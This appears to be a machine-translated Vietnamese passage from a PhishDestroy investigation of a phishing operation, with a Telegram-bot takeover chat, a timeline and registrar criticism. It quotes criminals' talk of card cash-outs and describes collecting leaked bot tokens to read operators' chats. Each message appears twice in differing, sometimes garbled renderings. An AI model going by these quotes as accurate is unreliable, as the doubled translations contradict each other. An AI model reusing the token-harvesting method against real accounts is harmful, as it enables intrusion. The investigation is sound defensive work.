Trước đây, các cửa hàng thực phẩm cao cấp thường có 10 tủ lạnh không cần làm lạnhTrước đây, các loại sơn cao cấp thường được sơn 10 lớp
B
Bonya2024-09-11 15:06
À, 922 cũng đang ở mức 1 và vẫn giữ vững.À, 922 cũng vào được 1 lần rồi, họ đang giữ
B
Bonya2024-09-11 15:05
Ngay cả việc đi khám tư nhân sau 3 lần cũng khiến họ hoảng sợ.Ngay cả tài khoản riêng tư cũng bị lừa sau 3 lần truy cập
B
Bonya2024-09-11 15:05
Nếu 1 đại diện phụ trách 1-2 ngân hàngNếu 1 proxy tương ứng với 1-2 ngân hàng điện
B
Bonya2024-09-11 15:05
À, điều đó còn tùy thuộc vào ngân hàng nàoCũng tùy thuộc vào ngân hàng nào
B
Bonya2024-09-11 15:04
Các đại diện thường rất bẩn thỉu trong những trò lừa bịp kiểu laksheriTrong các trang web khiêu dâm, các máy chủ proxy thường chứa nội dung bẩn thỉu
B
Bonya2024-09-11 08:44
Nó đang ngủ à?Còn anh ấy thì đang ngủ à?
B
Bonya2024-09-11 08:40
Ồ, đó là một ý tưởng tuyệt vời.О zbs đã nghĩ ra
B
Bonya2024-09-11 08:40
Ở đó chẳng có cái gì giống như chợ trời hay gì đó sao?Sao ở đó lại không có mấy cái chợ trời kiểu thế này thế kia nhỉ?
B
Bonya2024-09-11 08:40
Thật là thảm hạiХуево
B
Bonya2024-09-11 08:39
BilyaBilyá
B
Bonya2024-09-11 08:39
Có phòng trò chuyện không?Ở đó có phòng chat không?
B
Bonya2024-09-11 08:38
Có ai biết khôngCó ai biết không?
B
Bonya2024-09-11 08:38
Mọi người ở finca có dùng tg không?Ở Phần Lan, mọi người có dùng Telegram không?
B
Bonya2024-09-10 12:14
Cảm ơn.Cảm ơn
B
Bonya2024-09-10 12:13
Bây giờ là mấy giờ ở Phần Lan?Giờ này ở Phần Lan chắc đang là giờ cao điểm
-- Tin tức mới nhất/Xác minh/Kiếm tiền💃🛍 (37 bài đăng) --
B
Bonya2024-06-16 17:17
Tôi không thấy ai là người bảo vệ cô ấy một cách quyết liệt cảTôi không thấy ai ở đây là những người ủng hộ cô ấy một cách nhiệt tình cả
B
Bonya2024-06-16 17:17
Thôi thì tóm lại, tình hình đã được trình bày rõ ràng, và sau đó mỗi người tự đưa ra quyết định của mình; còn việc chỉ có quản trị viên Pasha đứng ra bênh vực cô ấy thì đã nói lên rất nhiều điều rồi.Thôi thì tôi đã trình bày rõ tình hình rồi, còn sau đó mỗi người tự đưa ra quyết định của mình; còn việc chỉ có quản trị viên Paşa đứng ra bảo vệ cô ấy thì đã nói lên rất nhiều điều rồi.
B
Bonya2024-06-16 17:15
Và cô ấy lại không chi tiền lần nữaVà cô ấy lại không thanh toán
B
Bonya2024-06-16 17:15
Không, cô ấy đã chuyển khoản cho chúng tôi, nhưng sau đó chúng tôi không có tài khoản chính để chuyển tiền lại, nên chúng tôi đã viết thư cho Vika như một biện pháp cuối cùng.Không, cô ấy đã chuyển khoản cho chúng tôi, nhưng lúc đó chúng tôi không có phương thức thanh toán chính để chuyển tiền, nên chúng tôi đã nhắn tin cho Vike như một giải pháp cuối cùng.
B
Bonya2024-06-16 17:14
Ban đầu chúng tôi cũng không có vấn đề gì, nhưng gần đây tiền của các bạn cứ liên tục biến mất.Ban đầu mọi chuyện ở chỗ chúng tôi cũng bình thường, nhưng gần đây tiền của các bạn cứ liên tục biến mất
B
Bonya2024-06-16 17:14
Tôi có phải đang gửi thư rác không? Tôi chỉ đang ngồi đây nói sự thật cho mọi người thôi. Cứ vứt đi cũng được. Hãy cho mọi người biết cách làm việc của bạn.Còn tôi thì sao, có phải tôi đang gửi spam không? Tôi chỉ đang ngồi đây nói sự thật cho mọi người nghe thôi. Cậu có thể xóa đi cũng được, có gì thay đổi đâu? Hãy để mọi người biết các cậu làm việc như thế nào.
B
Bonya2024-06-16 17:13
Khi bạn có một trong những thứ nàyKhi điều đó xảy ra với bạn
B
Bonya2024-06-16 17:13
Vậy thì đã đến lúc bạn nên suy ngẫm rồiVậy thì đã đến lúc các bạn nên suy ngẫm rồi
B
Bonya2024-06-16 17:13
Chúng tôi cũng đã hợp tác với nei từ lâu rồi và đây là lần thứ hai xảy ra tình huống như vậyChúng tôi cũng đã làm việc với cô ấy từ lâu rồi và đây đã là lần thứ hai xảy ra tình huống như vậy
B
Bonya2024-06-16 17:13
Và cô ấy đã ghi lại các gs rồi nói: “Cậu biết cách nó hoạt động rồi mà.”Còn cô ấy thì ghi lại mã GS và nói rằng các bạn biết cách nó hoạt động rồi
B
Bonya2024-06-16 17:13
Đúng là chuyện như thế đấy, để tôi kể lại từ đầu nhé: chúng tôi lấy thẻ của cô ấy để rút tiền, nạp vào 60k, cô ấy đi rút thì lại thấy thông báo rằng tiền sẽ không có ở đó vì máy ATM đã nuốt mất thẻ, thế là xong, chúng tôi vừa vứt đi 60k.Chính xác là chuyện này đây. Thôi thì bắt đầu lại từ đầu nhé: trước tiên, chúng tôi lấy thẻ ngân hàng của cô ấy, nạp vào 60k, rồi cô ấy đi rút tiền nhưng lại bảo là không rút được, với lý do máy ATM đã “nuốt” thẻ của cô ấy và thế là hết chuyện. Cuối cùng, chúng tôi đành phải bỏ mất 60k đó.
B
Bonya2024-06-16 17:11
Cô ấy không phải là người khiến chúng ta phải làm theoChẳng phải chúng ta đang ở nhà cô ấy sao?
B
Bonya2024-06-16 17:11
Mặc dù chúng tôi đã bị mất 60kMặc dù chúng tôi đã bị mất 60k
B
Bonya2024-06-16 17:11
Bình thường ư? Chúng tôi đã giải thích tất cả ở đây rồi. Anh đang nói chúng tôi là lũ ngốc à.Bình thường à? Chúng tôi đã giải thích rõ ràng hết rồi mà, các anh lại bảo chúng tôi là lũ ngốc
B
Bonya2024-06-16 17:10
Cậu đang bênh vực cô ấyAnh đang bảo vệ cô ấy
B
Bonya2024-06-16 17:10
Cô ấy vẫn còn giữ tiền của chúng taTiền của chúng tôi vẫn còn ở chỗ cô ấy
B
Bonya2024-06-16 17:10
Tất cả bọn họTất cả
B
Bonya2024-06-16 17:10
Rằng một người đàn ông đã chi ra 60 grand, còn cô ấy thì nói là không có tiền.Người ta đã chuyển cho anh ta 60k, nhưng anh ta nói sẽ không có tiền
B
Bonya2024-06-16 17:10
Mô tả*Đã mô tả*
B
Bonya2024-06-16 17:10
Toàn bộ tình hình đã được trình bày cho các bạn rồiHọ đã giải thích rõ ràng toàn bộ tình huống cho cậu rồi
B
Bonya2024-06-16 17:09
Ai là người bỏ cuộc? Cô ấy hay chúng ta?Ai là người gây ra chuyện này, cô ấy hay chúng ta?
B
Bonya2024-06-16 17:09
Chúng ta có 60 grand trong ngân hàng. Tiền đâu rồi?Đã nạp 60k rồi, tiền đâu rồi?
B
Bonya2024-06-16 17:09
Tình huống này đã được giải thích rõ ràng cho bạn rồi, dù bạn là nam hay nữ cũng không thành vấn đề.Những người phụ nữ nào đã giải thích cho cậu về toàn bộ tình huống này, giới tính hoàn toàn không quan trọng
B
Bonya2024-06-16 17:08
Rút 60 grand rồi về nghỉ đi.Kiếm 60k rồi bỏ qua
B
Bonya2024-06-16 17:08
Hoặc thì đéo mày đi, miễn là trong chừng mực hợp lý.Hay là các bạn có thể làm điều đó trong phạm vi hợp lý chứ?
B
Bonya2024-06-16 17:08
Mọi người không có gì để trả cảMọi người lấy tiền ở đâu ra để trả?
B
Bonya2024-06-16 17:08
Và anh ta nói rằng thẻ đã bị hỏng và anh ta hết tiền rồi.Và anh ta nói là thẻ bị kẹt, không có tiền
B
Bonya2024-06-16 17:08
Một người đàn ông được cho 60 grand, cô ấy đi quay phim.Một người phụ nữ được cho 60k, cô ấy đi quay phim
B
Bonya2024-06-16 17:07
Vậy là anh sẽ cho tôi biết sự thật.Vậy thì hãy giải thích dựa trên thực tế đi
B
Bonya2024-06-16 17:07
Vậy thì ai mới là thằng đáng trách đây, ai mới là thằng bỏ rơi tớ chứ?Thế thì ai là thằng khốn phải chịu trách nhiệm đây, ai là thằng ngu ngốc đây, là tớ à?
B
Bonya2024-06-16 17:07
Không có gì để nói à?Không có gì để nói à?
B
Bonya2024-06-16 17:07
Hoặc là tôi không gõ được cái mã PIN chết tiệt đó.Hay là mẹ kiếp, tay cong thế này mà còn không gõ được chữ “pin” nữa
B
Bonya2024-06-16 17:06
Sao máy ATM lại có thể kẹt thẻ được chứ?Làm sao mà cái máy ATM khốn kiếp đó lại nuốt mất thẻ được chứ
B
Bonya2024-06-16 17:06
Các mồiHút ngược
B
Bonya2024-06-16 17:06
Và mày đang hăng hái làm việc vì cô ta.Còn các anh thì đang tải game cho cô ấy làm cái quái gì ở đây vậy?
B
Bonya2024-06-16 17:06
Bọn thiên bẩm khốn kiếp các người đúng là lũ ngu ngốc. Có một con đàn bà khốn kiếp đang ngồi đây loay hoay với tiền của mình, thế mà thẻ của cô ta lại bị máy ATM nuốt mất rồi.Mẹ kiếp, mấy người đúng là lũ điên rồi, có cái thứ vớ vẩn nào đó ngồi trên đầu bà già, cứ lải nhải rằng máy ATM đã kẹt thẻ của bà ấy rồi
B
Bonya2024-06-16 16:40
@kysia1987 đừng có lừa đảo, đã bị đá văng và sáp nhập với 60k@kysia1987 Đừng dính vào trò lừa đảo này, tôi đã nạp một ít tiền rồi mất trắng 60k

MONETTI ESCOBAR: Ông chủ thầm lặng

Hoàn toàn trái ngược với 261 tin nhắn của Bonya, MONETTI chỉ có 10 tin nhắn công khai — tất cả đều nằm trong một chuỗi bài đăng trên TraFFeeQ Chat (Kinh doanh chênh lệch lưu lượng truy cập ADS/SEO từ các nguồn đen), bênh vực một đồng nghiệp:

TraFFeeQ ChatTháng 12 năm 2025
"Một người làm công việc của mình, rồi được trả tiền cho việc đó — có muốn bàn luận không?"
Người ta làm công việc của mình, được trả tiền cho công việc đó, còn gì để bàn nữa)
Coi công việc phạm tội là “chỉ là một công việc bình thường”
TraFFeeQ ChatTháng 12 năm 2025
"Không có gì để bàn với anh cả"
Với cậu thì chẳng có gì để bàn cả
Quyền lực mang tính coi thường — tư duy kiểu sếp, không chấp nhận tranh luận
TraFFeeQ ChatTháng 12 năm 2025
"Ngoài cậu ra, còn rất nhiều việc phải làm!"
Không có cậu thì vẫn có việc để làm)
Điều này ngụ ý có nhiều hoạt động diễn ra đồng thời đòi hỏi sự chú ý của anh ấy

Các nhóm Telegram của MONETTI sẽ cho mọi người biết thêm chi tiết: Medusa Google Ads (gian lận PPC kiểu black-hat), một Kênh Deepfakes (phương tiện tổng hợp dùng để gian lận), và TRÒ CHUYỆN VỀ MARLBORO (riêng tư, không rõ). Gói đăng ký Telegram Premium, giờ làm việc 24/7 và "Есть предложение" ("Có một đề xuất") Tiểu sử kinh doanh của người này cho thấy hình ảnh của một người coi tội phạm mạng như một hoạt động kinh doanh toàn thời gian.

MONETTI ESCOBAR: Nhật ký tin nhắn đầy đủ (10 tin nhắn)
MONETTI ESCOBAR (@monettiescobar) — Toàn bộ lịch sử tin nhắn đã được dịch
-- TraFFeeQ Chat | Phân phối lưu lượng truy cập | Quảng cáo đen/SEO | (9 tin nhắn) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Thôi đi!Thôi đi!
ME
MONETTI ESCOBAR2025-12-06 20:42
Một người đàn ông đang làm công việc của mìnhNgười đó đang làm công việc của mình
ME
MONETTI ESCOBAR2025-12-06 20:42
Không có hành vi xâm lượcHoàn toàn không có hành vi xâm lược
ME
MONETTI ESCOBAR2025-12-06 20:40
Cũng đừng lo về chuyện đó đâuĐừng lo lắng về chuyện đó nữa
ME
MONETTI ESCOBAR2025-12-06 20:39
Nói chuyện với anh ấy đi, anh bạn. Anh ấy không bị cấm làm thế đâu.Nói chuyện với anh ấy đi, anh bạn, chẳng ai cấm anh ấy làm thế cả
ME
MONETTI ESCOBAR2025-12-06 20:39
(Ngoài cậu ra thì còn rất nhiều việc để làm nữa!)(Còn nhiều việc để làm ngoài việc ở bên em!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Không có gì để bàn bạc với anh cảVới cậu thì chẳng có gì để bàn cả
ME
MONETTI ESCOBAR2025-12-06 20:38
Nó được ghi ngay bên cạnh biệt danh của anh ấy. Bạn không cần phải chọc vào đâu, bạn sẽ đọc thấy thôi.Bên cạnh tên người dùng của anh ấy có ghi là “đừng dùng đại từ ‘ты’”, hãy đọc kỹ đi
ME
MONETTI ESCOBAR2025-12-06 20:38
Người đàn ông đó làm công việc của mình, anh ta được trả tiền cho việc đó, (thích thảo luận)Mỗi người làm công việc của mình, họ được trả tiền cho việc đó, nếu thích thì cứ thảo luận đi)
-- Medusa | Google Ads | Trò chuyện (1 tin nhắn) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
Hồ sơ Telegram của MONETTI ESCOBAR
Ảnh chụp màn hình 2 — Hồ sơ Telegram của MONETTI.
Hồ sơ Telegram của Bonya
Ảnh chụp màn hình 3 — Hồ sơ của Bonya. Lưu ý DC2 (Amsterdam).

Phần 7: Phòng an toàn

Sau khi PhishDestroy truy cập vào nhóm điều hành thông qua bot Telegram bị lộ, cuộc trao đổi sau đây đã diễn ra. Bản ghi cuộc trò chuyện dưới đây đã được dịch sang tiếng Anh, trong đó nội dung gốc bằng tiếng Nga được giữ nguyên và in nghiêng. Danh tính được sử dụng để truy cập đã bị che đi.

Nhóm người điều hành — "Thẻ Idr" — Lịch sử trò chuyện đầy đủ (61 tin nhắn)
— REDACTED đã đăng nhập thông qua mã thông báo bot bị lộ —
R
ĐÃ BỊ CHE ĐẬY25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
AiAi
B
Bonya25-03-2026 13:07:14
XzХз
R
ĐÃ BỊ CHE ĐẬY25-03-2026 13:07:14
Xin chào, bạn chỉ cần nhấn để lưu dữ liệu, chờ một chút nhé
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Cái quái gì thế nàyCái quái gì thế
B
Bonya25-03-2026 13:07:27
Mẹ kiếpChết tiệt
B
Bonya25-03-2026 13:07:28
Đó chính là người đóThế thì ai?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Ừm.Ahaha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Cái quái gì thế?Cái quái gì thế
B
Bonya25-03-2026 13:07:53
Bot đã bị xâm nhậpBot đã bị hack
B
Bonya25-03-2026 13:08:16
Tôi nghe nói hàng thủ của chúng ta đang rối tung lên.À mà này, người ta bảo tôi là hệ thống phòng thủ của tụi mình mạnh kinh khủng
B
Bonya25-03-2026 13:08:22
À, có một loại...À, có một gã kiểu đó
B
Bonya25-03-2026 13:08:43
Nó giống như việc xâm nhập một bot thông qua một cuộc tấn công lừa đảo.Chúng ta có một con bot qua Fish, việc phá hỏng nó dễ như búng ngón tay vậy
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[ĐÃ BỊ CHE ĐỔI].[ĐÃ BỊ CHE ĐỘI]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Đó là ai vậy?Đó là ai vậy?
B
Bonya25-03-2026 13:10:29
Hãy kiểm tra hồ sơ của bạn.Bạn hãy kiểm tra hồ sơ của mình đi
B
Bonya25-03-2026 13:10:32
Đó là một hackerĐây là một hacker
B
Bonya25-03-2026 13:10:35
Theo nghĩa đen.Theo nghĩa đen
B
Bonya25-03-2026 13:10:41
Dịch những gì anh ấy đang truyền đạtĐã dịch những gì anh ấy viết trên kênh
B
Bonya25-03-2026 13:10:55
[ĐÃ BỊ CHE — Bonya sao chép và dán tin nhắn từ kênh đã báo cáo tên miền của họ, nhằm xác định xem ai là người đã báo cáo họ]
B
Bonya25-03-2026 13:12:19
Vậy thì, ừm.Thôi thì...
B
Bonya25-03-2026 13:12:23
Tao chả biết mẹ kiếp đó là ai.Mình chả biết đó là ai
B
Bonya25-03-2026 13:12:25
Nhưng không phải mãi mãiNhưng không phải là điều tốt
B
Bonya25-03-2026 13:12:47
@devosus, hãy nghĩ đến việc phòng thủ trước khi chúng ta bị đánh tơi tả.@devosus, hãy nghĩ đến việc phòng thủ đi, trước khi bọn chúng xé nát mông tụi mình
Lời chú thích của biên tập viên: Bonya cảm thấy điều đó sắp xảy ra. Giả sử anh ta là người Nga và coi việc lừa đảo Ukraine là “hành động yêu nước”. Vậy còn Indonesia thì sao — một Đối tác của BRICS kể từ tháng 10 năm 2024 (Hội nghị thượng đỉnh Kazan)? Việc ăn cắp tài sản của công dân các nước đồng minh có phải cũng là hành động yêu nước không? Những kẻ lừa đảo thuộc Cộng đồng Các Quốc gia Độc lập (CIS) là những tên trộm “không phân biệt đối tượng”, hoàn toàn thiếu trí tuệ và lòng trung thành. Hãy đọc các bài điều tra khác của chúng tôi, nơi chúng tôi đã ghi chép lại các vụ truy tố Đối với các toán tử tương tự — kết quả cuối cùng luôn giống nhau.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Ừ, tớ hiểu rồi.Ừ, tôi thấy rồi
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Đi chết đi.Thôi, đừng có nói nhảm nữa
B
Bonya25-03-2026 13:13:09
À, mà bị vắt kiệt sức cũng chẳng thú vị gì cho cam.Thôi thì, được gộp lại với nhau cũng chẳng thú vị lắm
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Anh ấy sẽ chẳng làm gì cảAnh ta sẽ chẳng làm gì cả
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Anh ta sẽ làm gì đây?Anh ta sẽ bán đứng ai?
D
Devoys25-03-2026 13:13:26
đó là gìĐó là gì vậy?
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Ừ, có một anh chàng đã tham giaÀ, anh ấy đã tham gia rồi
D
Devoys25-03-2026 13:13:34
từ đâutừ đâu
B
Bonya25-03-2026 13:13:35
Dù bạn có đăng nhập vào trang lừa đảo đó vài lần bằng địa chỉ IP của chính mình đi chăng nữa, thì giờ đây điều đó cũng không còn hay ho gì nữa.Dù đã vào trang web cá cược từ địa chỉ IP của mình vài lần rồi thì cũng chẳng còn thú vị nữa
ME
MONETTI ESCOBAR25-03-2026 13:13:37
Gửi đến nhómVào nhóm
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzХз
D
Devoys25-03-2026 13:13:39
khi thực hiện nội suykhi ở Interpol
D
Devoys25-03-2026 13:13:41
đến đók như thế nào
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Cái nàyĐây là
B
Bonya25-03-2026 13:13:46
Tớ chỉ vào đây để trò chuyện thôiVào đây để tham gia cuộc trò chuyện
B
Bonya25-03-2026 13:13:49
Anh ấy đã viết rằngĐã viết rằng
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Xin chào, bạn chỉ cần nhấn để lưu dữ liệu, chờ một chút nhé
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Ảnh được chia sẻ]
D
Devoys25-03-2026 13:14:31
Tôi đã từng thấy họ rồi.Tôi đã từng thấy những thứ như thế rồi
B
Bonya25-03-2026 13:14:44
Chà, chúng ta cũng bị phát hiện dùng bot ukr rồi.Thế là bọn mình cũng bị bot Ukraine làm phiền rồi
B
Bonya25-03-2026 13:14:55
Bạn đã không nhắn tin trong phòng chat.Chưa có ai viết gì trong phòng chat cả
B
Bonya25-03-2026 13:14:57
Chẳng phải cậu đã viết...À, không, họ đã viết rồi
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Tớ chả thèm quan tâm.Thôi kệ mẹ nó
B
Bonya25-03-2026 13:15:06
Thay mặt kênhThay mặt kênh
D
Devoys25-03-2026 13:15:23
Quên cái chuyện đó đi.Thôi kệ mẹ nó đi
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Tôi sẽ phá tan nhóm nàyTôi sẽ xóa nhóm này
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
đúng vậyđúng
— Nhóm đã bị chủ sở hữu xóa —

Nhóm đã bị xóa chỉ trong vài phút. Lời xác nhận cuối cùng của Bonya — "+" — cùng với câu xác nhận "yeah" của Devoys đã nói lên tất cả: Họ biết mình đã bị phát hiện, và cách duy nhất của họ là tiêu hủy chứng cứ. Nhưng đến lúc đó, dữ liệu đã được thu thập xong rồi.

Hãy lưu ý nhận xét tiết lộ của Bonya: "Chúng tôi cũng bị tấn công qua bot Ukraine" — xác nhận rằng cả hai dự án (của Ukraine và Indonesia) đều do cùng một đội ngũ vận hành phụ trách, và đây không phải là lần đầu tiên hệ thống cơ sở hạ tầng của họ bị xâm nhập.

Phần 8: Điều này cho thấy điều gì

PhishDestroy hoạt động như thế nào

Mọi tên miền xuất hiện trên phishdestroy.io được xử lý qua Pipeline tự động này. dopomogvoina[.]sbs cũng không phải là ngoại lệ.

Phát hiện
Phân tích tĩnh
Lập bản đồ cơ sở hạ tầng
Khám phá nguồn gốc
OSINT
Tạo báo cáo

Lịch trình điều tra

Ngày 20 tháng 3 năm 2026
Miền dopomogvoina[.]sbs đã đăng ký qua NiceNIC International
Ngày 21 tháng 3 năm 2026
Được phát hiện bởi Pipeline giám sát tự động của PhishDestroy
Ngày 21 tháng 3 năm 2026
Hoàn tất phân tích tự động toàn diện: đã lập bản đồ cơ sở hạ tầng, giải mã gói JS, ghi chép tài liệu về giao thức WebSocket
Ngày 22 tháng 3 năm 2026
Đã xác định được địa chỉ IP nguồn. Phát hiện dự án lừa đảo thứ hai (“HealthCare ID”) trên cùng một máy chủ
Ngày 22 tháng 3 năm 2026
Bị phơi bày config.json giúp xác định người dùng thông qua API Telegram Bot
Ngày 23 tháng 3 năm 2026
Các báo cáo về hành vi lạm dụng đã được gửi đến nhà cung cấp dịch vụ lưu trữ, Cloudflare và các CERT có liên quan
Ngày 25 tháng 3 năm 2026
Bài viết đã được đăng. Các báo cáo về tên miền hiện đang được cập nhật trực tiếp trên PhishDestroy

Làm thế nào điều này lại có thể xảy ra: Mạng lưới trí tuệ bot của PhishDestroy

Cuộc điều tra này được thực hiện hoàn toàn bởi hệ thống tự động. Pipeline của PhishDestroy không chỉ phát hiện các tên miền lừa đảo — mà còn xâm nhập vào cơ sở hạ tầng của những kẻ điều hành đứng sau chúng.

2,000+
Các bot Telegram bị thu thập
Hoạt động
Một số bot vẫn đang được theo dõi
Kể từ năm 2024
Bộ sưu tập đang được triển lãm

Khi các bộ công cụ lừa đảo tiết lộ mã thông báo bot Telegram — như trường hợp này đã xảy ra thông qua config.json — hệ thống của chúng tôi sẽ tự động thu thập các thông tin này, lập bản đồ các nhóm người vận hành, trích xuất danh sách thành viên và lưu trữ lịch sử tin nhắn. Hơn 2.000 bot đã được thu thập theo cách này kể từ năm 2024. Một số vẫn đang hoạt động, và chúng tôi thích theo dõi các tên tội phạm hành động theo thời gian thực — bởi vì kết cục đã được định sẵn.

Ngay cả những người dùng đã xóa tài khoản hoặc xóa các nhóm của mình cũng đã quá muộn. Khi họ hoảng loạn, chúng tôi đã nắm trong tay mọi thứ — kho lưu trữ tin nhắn, dữ liệu hồ sơ, thông tin thành viên nhóm, các bot được kết nối. Việc xóa bỏ không thay đổi gì cả. Dữ liệu đó đã tồn tại, và giờ đây nó đã có trong cơ sở dữ liệu của chúng tôi.

"Hãy chờ em" — Phiên bản lừa đảo

Trường hợp này không phải là duy nhất — đây là một ví dụ điển hình cho thấy sự cẩu thả có hệ thống của NiceNIC mà chúng tôi đã quyết định đưa ra làm ví dụ về “những hacker siêu đẳng”. Như “Типичный Мошенник” đã chỉ ra một cách chính xác: có sự khác biệt giữa hacker và kẻ lừa đảo — trí tuệ. Những kẻ này chẳng phải là tin tặc cũng chẳng thông minh gì.

Các hệ thống của PhishDestroy tự động thu thập bằng chứng như thế này trên hàng nghìn tên miền — theo dõi các bot, lưu trữ các cuộc trao đổi của những kẻ điều hành, lập bản đồ cơ sở hạ tầng. Trường hợp cụ thể này thực sự quá phi lý đến mức không thể không công bố. Bộ công cụ lừa đảo này thuộc loại thông dụng, các biện pháp bảo mật hoạt động (OPSEC) hoàn toàn không tồn tại, và những kẻ điều hành đã hoảng loạn xóa nhóm của chúng chỉ vài phút sau khi bị phát hiện.

Chúng tôi đang xây dựng một hệ thống sẽ hiển thị xác minh danh tính nhà điều hành ngay trên các trang báo cáo tên miền — từ kẻ lừa đảo thành nạn nhân, giống như chương trình truyền hình Nga “Жди Меня” (Hãy chờ em), nhưng theo chiều ngược lại. Chương trình này đã hoạt động ở chế độ kín từ năm 2024. Nhiều người điều hành đã được xác định danh tính — kể cả những người đã xóa tài khoản của mình. Chúng tôi đang xem xét để chọn ra những người thú vị cách trình bày vấn đề này. Hãy tiếp tục theo dõi nhé.

Các tên miền liên quan

Phân tích của chúng tôi đã xác định được một lĩnh vực thứ hai — hlpforvpeople[.]sbs — được đăng ký thông qua cùng một nhà đăng ký với các mẫu cơ sở hạ tầng trùng khớp. Cả hai tên miền này đều được ghi nhận trong cơ sở dữ liệu của chúng tôi:

Vi phạm quy định của cơ quan đăng ký: NiceNIC International

Công ty TNHH Tập đoàn Quốc tế NiceNIC (Hồng Kông) đã nhận được nhiều báo cáo chi tiết về hành vi lạm dụng từ PhishDestroy liên quan đến cả hai dopomogvoina[.]sbshlpforvpeople[.]sbs. Tại thời điểm xuất bản — 5 ngày sau báo cáo đầu tiên — Chưa có biện pháp nào được thực hiện. Cả hai tên miền vẫn hoạt động bình thường.

Đây không phải là trường hợp cá biệt. NiceNIC là một vấn đề thường xuyên xuất hiện trong các cuộc điều tra của chúng tôi. Địa chỉ liên hệ về các hành vi lạm dụng của nhà đăng ký (abuse@nicenic.net) liên tục không phản hồi các báo cáo về lừa đảo trực tuyến có đầy đủ bằng chứng. Mặc dù là một nhà đăng ký tên miền được ICANN công nhận và phải tuân thủ Thỏa thuận Công nhận Nhà đăng ký (RAA §3.18), NiceNIC vẫn hoạt động một cách ngang nhiên mà không bị trừng phạt.

NiceNIC duy trì sự hiện diện bằng tiếng Nga, bán .ru các tên miền với mức giá cao (~200 USD), và liên lạc với khách hàng qua VK và Telegram — những nền tảng phổ biến trong cộng đồng nói tiếng Nga. Việc đối tượng khách hàng của họ trùng lặp với các cộng đồng ngầm đặt ra những nghi vấn nghiêm trọng về việc việc nhà đăng ký tên miền không phản hồi các báo cáo lạm dụng là do sơ suất hay là một chiến lược kinh doanh có chủ đích.

Cuộc điều tra này đã được công bố một phần do sự chậm trễ kéo dài của NiceNIC. Khi các cơ quan đăng ký tên miền từ chối xử lý các hành vi lạm dụng liên quan đến lừa đảo qua email, việc vạch trần trước công chúng trở thành cơ chế duy nhất còn lại để buộc họ phải chịu trách nhiệm.

Những điểm chính cần lưu ý

  • Tự động hóa là cách duy nhất để bắt kịp xu hướng. Các bộ công cụ lừa đảo (phishing kits) được triển khai và biến thành công cụ tấn công chỉ trong vài giờ. Việc kiểm tra thủ công không thể mở rộng quy mô để theo kịp.
  • Người vận hành cũng có thể mắc sai lầm. Một tệp cấu hình bị lộ trong một dự án phụ đã vạch trần toàn bộ một chiến dịch lừa đảo qua email quy mô đa quốc gia. Rất khó để duy trì an ninh hoạt động (OPSEC) hoàn hảo trên mọi dự án.
  • Kỹ thuật xã hội không ngừng phát triển cùng với nhịp độ của các tin tức. Chiến tranh, viện trợ nhân đạo và các chương trình của chính phủ ngày càng bị lợi dụng làm mồi nhử trong các vụ lừa đảo qua email, bởi vì những đối tượng này nhắm vào những người đang lâm vào hoàn cảnh khó khăn – những người ít có khả năng nghi ngờ tính hợp pháp của chúng.
  • Việc tái sử dụng cơ sở hạ tầng đã trở thành tiêu chuẩn. Một máy chủ, hai dự án lừa đảo, hai quốc gia, cùng một nhóm điều hành. Việc lập bản đồ các kết nối hạ tầng cho thấy nhiều thông tin hơn hẳn so với việc chỉ phân tích riêng lẻ một tên miền.

Các nghiên cứu liên quan

Các cuộc điều tra khác từ Pipeline phân tích thông tin tự động của PhishDestroy

Bảng điều khiển TrustWallet bị lộ
Vụ xâm nhập bảng điều khiển quản trị đã phơi bày một chiến dịch lừa đảo tiền điện tử diễn ra trên nhiều quốc gia, kèm theo nhật ký trò chuyện của những kẻ điều hành.
Lộ diện các mạng lưới đánh cắp tiền điện tử
Phân tích cơ sở hạ tầng đằng sau các bộ công cụ lừa đảo nhằm vơ vét tài sản từ ví điện tử, nhắm vào người dùng DeFi.
NiceNIC: Nhà đăng ký tên miền tiếp tay cho tội phạm mạng
Cách một nhà đăng ký tên miền được ICANN công nhận liên tục phớt lờ các báo cáo về hành vi lạm dụng — kể cả trong cuộc điều tra này.
Vụ bê bối xmrwallet: 10 năm khóa riêng tư bị đánh cắp
Một vụ lừa đảo liên quan đến ví Monero kéo dài suốt một thập kỷ đã bị phanh phui nhờ phân tích JavaScript và điều tra pháp y tên miền.
Vạch trần cơ sở hạ tầng lừa đảo
Dịch vụ lưu trữ chia sẻ, nhà cung cấp dịch vụ chia sẻ — cách các mạng lừa đảo tái sử dụng cơ sở hạ tầng cho các chiến dịch khác nhau.
BuyTRX Drainer bị vạch trần
Một vụ lừa đảo liên quan đến năng lượng dựa trên TRON đang làm cạn kiệt ví tiền thông qua việc phê duyệt các hợp đồng thông minh độc hại.

Lưu ý: Cuộc điều tra này được thực hiện hoàn toàn thông qua hoạt động trinh sát thụ động và các API công khai. Không có bất kỳ hành vi truy cập trái phép nào vào bất kỳ hệ thống nào. Các lệnh gọi API của Telegram Bot đã sử dụng một mã thông báo (token) được các nhà điều hành công khai trên một điểm cuối không yêu cầu xác thực. Tất cả các tên miền trong bài viết này đã được làm mờ theo quy ước tiêu chuẩn về an ninh thông tin (InfoSec).

Chia sẻ cuộc điều tra này

X / Twitter Telegram Reddit LinkedIn

Các cuộc điều tra liên quan

